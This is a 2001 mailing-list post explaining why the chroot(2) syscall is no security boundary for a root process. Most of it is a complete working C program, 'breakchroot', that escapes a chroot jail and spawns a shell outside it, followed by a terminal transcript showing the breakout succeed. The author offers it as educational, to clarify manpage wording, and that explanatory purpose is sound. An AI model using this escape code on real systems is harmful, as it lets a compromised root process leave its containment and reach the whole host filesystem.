Christian Jaeger <[EMAIL PROTECTED]> writes:

>> Yep, that's already in the old manpage. For this reason it's very
>> important to chdir inside the chrooted tree before doing the chroot
>> call. (The chroot binary does this, as hopefully do all other programs
>> using chroot for security purposes). If you do that, the risk isn't
>> there anymore.
>
> Hmmmm, at first glance it even looks like a mistake in the chroot(2)
> manpage (from woody - in potato there's only the first of the two above
> sentences): `mkdir foo; chroot foo; cd ..' does *not* escape foo, at
> least not with the chroot command in potato (kernel 2.4.7).

It was really talking about syscalls, not commands.  While the chroot
command (chroot(3)) changes the working dir to the chrooted tree, the
syscall does not.  

Here's a sample program.  Build it with make -k breakchroot
CFLAGS="-static -g -Wall" (yes, there's no makefile... it's a
feature!) and put it inside your chrooted tree.  Then chroot chroot
(assuming bash is in the tree for this test), and ./breakchroot as root.
You'll get a shell located _outside_ the chroot.

If you have an attacker with a root process in a chroot jail, and they
can execute syscalls (which exploits do all the time) they won't need
a program like this sitting in the jail... this is just for
educational purposes.

Included is a script showing the breakout.  Please ignore any blatant
coding errors in this... I just whipped it up quickly and there are
probably better ways to do all of this.

-- 
Alan Shutko <[EMAIL PROTECTED]> - In a variety of flavors!
Bones: "The man's DEAD, Jim!"

#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Shows why chroot(2) on its own is no boundary for a root process:
 * the syscall moves the root but leaves the working directory alone. */
int main(void)
{
    int i;

    /* Make a subdirectory and chroot into it without chdir'ing first,
     * so the working directory is now outside the new root. */
    if (mkdir("breakout", 0777) < 0 && errno != EEXIST)
        perror("mkdir failed");
    if (chroot("breakout") < 0)
        perror("chroot failed");

    /* Outside the root, ".." is not clamped, so walk up to the real
     * filesystem root. */
    for (i = 0; i < 100; i++)
        if (chdir("..") < 0)
            perror("chdir failed");
    /* Make the real root the process root again. */
    if (chroot(".") < 0)
        perror("chroot2 failed");

    execl("/bin/bash", "/bin/bash", (char *)NULL);
    perror("execl failed");   /* only reached if the exec fails */

    exit(0);
}

Script started on Sun Oct  7 17:54:04 2001
wesley:/home/ats# ls
Desktop   RPG             chroot                   munster-stuff
Letters   Todo            core.12219               myth2-gg
Library   Work            glibc-2.2.4              nobackup
Mail      bin             glibc_2.2.4-3.diff.gz    preview
News      breakchroot     glibc_2.2.4-3.dsc        public_html
Photos    breakchroot.c   glibc_2.2.4.orig.tar.gz  tmp
Projects  breakchroot.c~  lang                     typescript
wesley:/home/ats# ls chroot
bin  breakchroot  breakout  lib
wesley:/home/ats# chroot chroot
wesley:/# ls
bash: ls: command not found
wesley:/# echo *
bin breakchroot breakout lib
wesley:/# ./breakchroot 
wesley:/# ls
bin    dev       dos     home    kiki        misc  proc  simon  var
boot   devlinux  etc     hubert  lib         mnt   root  tmp    vmlinuz
cdrom  devsco    floppy  initrd  lost+found  opt   sbin  usr    vmlinuz.old
wesley:/# echo      exit
wesley:/# echo *
bin breakchroot breakout lib
wesley:/# e exit
wesley:/home/ats# ls /
bin    dev       dos     home    kiki        misc  proc  simon  var
boot   devlinux  etc     hubert  lib         mnt   root  tmp    vmlinuz
cdrom  devsco    floppy  initrd  lost+found  opt   sbin  usr    vmlinuz.old
wesley:/home/ats# 
Script done on Sun Oct  7 17:54:30 2001
